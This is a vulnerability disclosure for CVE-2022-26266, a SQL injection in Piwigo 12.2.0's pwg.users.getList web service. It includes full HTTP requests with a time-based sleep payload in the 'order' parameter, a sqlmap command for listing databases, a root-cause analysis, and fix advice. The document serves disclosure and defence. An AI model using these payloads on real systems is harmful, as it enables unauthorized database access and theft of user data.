Headline
CVE-2022-26266: Vul/Piwigo_12.2.0_SQLinject.md at main · JCCD/Vul
Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.
Vulnerability details
vulnerability type: SQL injection
vulnerability versions: piwigo 12.2.0
vulnerability Url: http://10.92.66.148/piwigo/ws.php?format=json&method=pwg.users.getList
SQL injected fields exist:order
verification procedure
log on to the system and go user-Management-user list Vulnerability Data:
POST /piwigo/ws.php?format=json&method=pwg.users.getList HTTP/1.1 Host: 10.92.66.148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 101 Origin: http://10.92.66.148 Connection: close Referer: http://10.92.66.148/piwigo/admin.php?page=user_list Cookie: pwg_id=pkl5bk0ifq21ss8nb2j126u55j; pwg_display_thumbnail=no_display_thumbnail; pwg_album_manager_view=tile; pwg_plugin_manager_view=classic; pwg_user_manager_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64 display=all&order=(select*from(select+sleep(5)union/**/select+1)a)&page=0&per_page=5&exclude%5B%5D=2
Modify the exclude[] field and use Sleep(5) to execute SQL statements with a delay of 5 seconds. As shown in the following figure, data is returned with a delay of 5 seconds, proving that SQL injection exists: Use SQLmap to verify vulnerabilities. Data packets are marked as injection points:
POST /piwigo/ws.php?format=json&method=pwg.users.getList HTTP/1.1 Host: 10.92.66.148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 55 Origin: http://10.92.66.148 Connection: close Referer: http://10.92.66.148/piwigo/admin.php?page=user_list Cookie: pwg_id=pkl5bk0ifq21ss8nb2j126u55j; pwg_display_thumbnail=no_display_thumbnail; pwg_album_manager_view=tile; pwg_plugin_manager_view=classic; pwg_user_manager_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64 display=all&order=*&page=0&per_page=5&exclude%5B%5D=2
Execution Parameters py -3 sqlmap.py -r text.txt --batch --dbs You can see that the database name has been read, so you can Dump sensitive data directly from the database. Furthermore, if the database has DBA privileges, an attacker can take over the server.
Vulnerability analysis
By analyzing the PHP files imported from ws.php and the parameters in the packet, you can trace it back to pwg.users.php
pwg.users.php is located in \include\ws_functions\pwg.users.php, and the order parameter is inserted into the SQL statement to join the query. And the SQL statement does not verify the validity of the passed parameters, resulting in SQL injection.
Vulnerability Fix
- Precompile SQL statements in query parameters and filter special characters such as single and double quotation marks.
- Perform a global check on SQL injection to prevent SQL injection.